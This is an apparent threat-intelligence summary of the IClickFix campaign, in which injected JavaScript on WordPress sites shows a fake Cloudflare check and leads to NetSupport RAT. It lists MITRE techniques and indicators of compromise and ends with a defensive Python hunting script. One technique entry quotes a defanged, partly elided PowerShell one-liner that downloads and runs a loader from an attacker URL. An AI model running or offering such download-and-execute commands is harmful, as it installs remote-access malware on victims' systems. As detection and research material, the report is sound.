IClickFix is a widespread malicious JavaScript framework that has been injected into over 3,800 compromised WordPress sites since at least December 2024 to display a fake Cloudflare Turnstile (ClickFix) lure and deliver downstream payloads. The framework uses a YOURLS-based Traffic Distribution System, multi-stage obfuscated JavaScript, and clipboard-based social engineering to install NetSupport RAT via a PowerShell dropper. #IClickFix #NetSupportRAT
Key points
- IClickFix is a multi-stage malicious JavaScript framework injected into compromised WordPress sites that replaces legitimate pages with a fake Cloudflare Turnstile ClickFix lure to trick users into running commands.
- The operator abuses YOURLS as a Traffic Distribution System (TDS) to filter visitors, evade bots/scanners, and redirect to staged JavaScript payloads.
- ClickFix lures copy a malicious command to the victim’s clipboard that runs a PowerShell loader (SHA256: 05b03a25…) which drops NetSupport RAT components and establishes persistence via the Windows Run registry key.
- NetSupport RAT deployment includes multiple component files (client32.exe, libraries, configuration and licence files) and hardcoded C2 gateways and endpoints (e.g., /fakeurl.htm) used for C2 communications.
- Historical evolution: in early 2025 IClickFix distributed Emmenhtal Loader and XFiles Stealer; throughout 2025 the operator refined lures, added TDS protection, and expanded to thousands of WordPress sites.
- Compromised sites span 82 countries and many industry verticals, indicating opportunistic mass exploitation rather than narrowly targeted operations.
- Sekoia.io provides YARA rules to detect the ic-tracker-js tag, the obfuscated JavaScript stages, and the ClickFix lure HTML for detection and hunting.
MITRE Techniques
- [T1189] Drive-by Compromise – IClickFix compromises legitimate WordPress sites and uses them as watering holes to serve malicious JavaScript and lure pages (‘a watering hole attack is a strategic attack where operators compromise a legitimate website known to be frequented by a specific target group, effectively ambushing users who visit the trusted source’).
- [T1204] User Execution – The ClickFix lure instructs users to copy and execute a command to complete the fake verification, relying on social engineering to achieve execution (‘When the user attempts to resolve the challenge, he is instructed to copy and execute a specific command to complete the verification’).
- [T1059.001] PowerShell – The ClickFix command executes a PowerShell command that downloads and runs an obfuscated PowerShell script used as a dropper (‘powershell -w hidden -nop -c "…;iwr 'hxxps://scottvmorton[.]com/tytuy.json' -OutFile $p;cmd /c start powershell -w hidden -ep Bypass -f $p"’).
- [T1105] Ingress Tool Transfer – The attack downloads remote payloads (PowerShell scripts disguised as JSON files and JavaScript stages) from attacker-controlled URLs to the victim system (‘iwr 'hxxps://scottvmorton[.]com/tytuy.json' -OutFile $p’).
- [T1071.001] Application Layer Protocol: Web Protocols – NetSupport RAT and other stages communicate with C2 servers over HTTP/S to endpoints such as /fakeurl.htm for command-and-control traffic (‘The malware communicates with its C2 servers on the endpoint /fakeurl.htm’).
- [T1027] Obfuscated Files or Information – The JavaScript and the PowerShell loader are obfuscated (base64 encoding, string slicing) to hinder analysis and detection (‘obfuscated via base64 encoding and string slicing’ and ‘obfuscated JavaScript file’).
- [T1547.001] Registry Run Keys / Startup Folder – Persistence is achieved by creating a Run registry key that points to the NetSupport client executable (client32.exe) (‘Establish persistence via the Windows Run registry key, pointing to the executable client32.exe’).
- [T1070.004] Indicator Removal on Host (Clear Command/History) – The PowerShell loader clears the RunMRU command history to remove traces of the ClickFix command before self-removal (‘Clear the RunMRU (most recently used) command history to remove traces of the ClickFix command, then self-remove’).
- [T1041] Exfiltration Over C2 Channel – The first-stage JavaScript exfiltrates fingerprint and host data to a base64-encoded URL parameter pattern (.php?data=…) used by the framework’s infrastructure (‘Exfiltrates the fingerprint data, the compromised site’s domain and the timestamp, to a base64-encoded URL using the pattern: .php?data={"host": ,"now": }’).
Indicators of Compromise
- [Domain] IClickFix redirection / stage 1 domains – ksfldfklskdmbxcvb[.]com, qq525f.short[.]gy, and dozens of other redirection domains used in the YOURLS/TDS chain.
- [Domain] JavaScript hosting domains (stage 1) – ksdkgsdkgkgmgm[.]pro, bestieslos[.]com, and other domains hosting the obfuscated first-stage JavaScript.
- [Domain] Compromised WordPress sites hosting the ClickFix lure (stage 2) – booksbypatriciaschultz[.]com, 1teamintl[.]com, and over 3,800 other infected WordPress domains serving the lure.
- [Domain] NetSupport RAT C2 domains – pusykakimao[.]com (gateway listed in client32.ini), fnotusykakimao[.]com (secondary gateway), and other C2 domains observed in the campaign.
- [IP address] NetSupport RAT C2 IPs and URLs – 85.208.84[.]35 (http://85.208.84[.]35:443/fakeurl.htm), 141.98.11[.]175 (http://141.98.11[.]175/fakeurl.htm), and other C2 IPs observed serving /fakeurl.htm.
- [File Hash] PowerShell loader SHA256 – 05b03a25e10535c5c8e2327ee800ff5894f5dbfaf72e3fdcd9901def6f072c6d (PowerShell dropper masquerading as SecureModule Engine v1.0.0).
- [File Hash] NetSupport component hashes – client32.exe SHA256: 06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268, AudioCapture.dll SHA256: 2cc8ebea55c06981625397b04575ed0eaad9bb9f9dc896355c011a62febe49b5, and other NetSupport component hashes (many more listed).
- [Filename] NetSupport RAT files dropped to disk – client32.exe, NSM.LIC, client32.ini, AudioCapture.dll, remcmdstub.exe, and numerous other NetSupport components written under ProgramData\S1kCMNfZi3.
- [URL] Malicious download and loader URLs – hxxps://scottvmorton[.]com/tytuy.json (PowerShell payload disguised as JSON), hxxps://ksfldfklskdmbxcvb[.]com/gigi?ts=… (injected script URL), and hxxps://ksdkgsdkgkgmgm[.]pro/ofofo.js (first-stage JS).
- [HTML tag] Distinctive injected tag used to find compromised pages – id="ic-tracker-js" (used in YARA detection to identify infected WordPress pages).
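The two page-level artefacts above (the injected ic-tracker-js tag and the .php?data=<base64 JSON> exfiltration pattern from T1041) can be hunted for directly. The following is an added example written for this summary, not Sekoia.io's YARA rules or code from the report: it checks fetched HTML for the tag and decodes the data parameter in proxy log lines, reporting only payloads that carry the host and now keys. The sample page, log lines and all hostnames in it are constructed placeholders, not indicators from the report.

```python
import base64
import json
import re
from urllib.parse import unquote

# Constructed sample page: the id value is the one the report names; the src
# host is a placeholder, not an indicator from the report.
SAMPLE_HTML = (
    '<html><head><title>Shop</title>'
    '<script id="ic-tracker-js" src="https://redirect.invalid/gigi?ts=1700000000">'
    '</script></head><body>Welcome</body></html>'
)

# Constructed proxy log lines: "<timestamp> <client> <url>". Only the second one
# carries the .php?data=<base64 JSON {host, now}> pattern; hosts are placeholders.
_EXFIL_JSON = json.dumps({"host": "victim-site.invalid", "now": 1740823201})
SAMPLE_LOGS = [
    "2025-03-01T10:00:00Z 10.0.0.5 https://www.example.org/index.php?page=2",
    "2025-03-01T10:00:01Z 10.0.0.5 https://stage.invalid/p.php?data="
    + base64.b64encode(_EXFIL_JSON.encode()).decode(),
    "2025-03-01T10:00:02Z 10.0.0.6 https://cdn.example.net/app.js?data=abc",
]

TRACKER_TAG = re.compile(r'<script\b[^>]*\bid\s*=\s*["\']ic-tracker-js["\']', re.I)
EXFIL_PARAM = re.compile(r'\.php\?(?:[^#&]*&)?data=([A-Za-z0-9+/=_%-]+)')


def find_tracker_tag(html: str) -> bool:
    """True if the page carries the injected ic-tracker-js script tag."""
    return bool(TRACKER_TAG.search(html))


def decode_exfil_param(url: str):
    """Decode a .php?data=<base64> parameter; return the dict only if it has host and now."""
    m = EXFIL_PARAM.search(url)
    if not m:
        return None
    # Accept percent-encoded, url-safe and unpadded base64 variants.
    b64 = unquote(m.group(1)).replace("-", "+").replace("_", "/")
    try:
        obj = json.loads(base64.b64decode(b64 + "=" * (-len(b64) % 4)))
    except ValueError:  # covers binascii.Error, JSONDecodeError, UnicodeDecodeError
        return None
    return obj if isinstance(obj, dict) and {"host", "now"}.issubset(obj) else None


def hunt_logs(lines):
    """Return (line, decoded_payload) for every log line whose URL matches the pattern."""
    hits = []
    for line in lines:
        decoded = decode_exfil_param(line.rsplit(" ", 1)[-1])
        if decoded is not None:
            hits.append((line, decoded))
    return hits
```

The decoded host field names the compromised site the visitor came from, which is the pivot a responder needs to notify the site owner and to scope which pages to check for the tag.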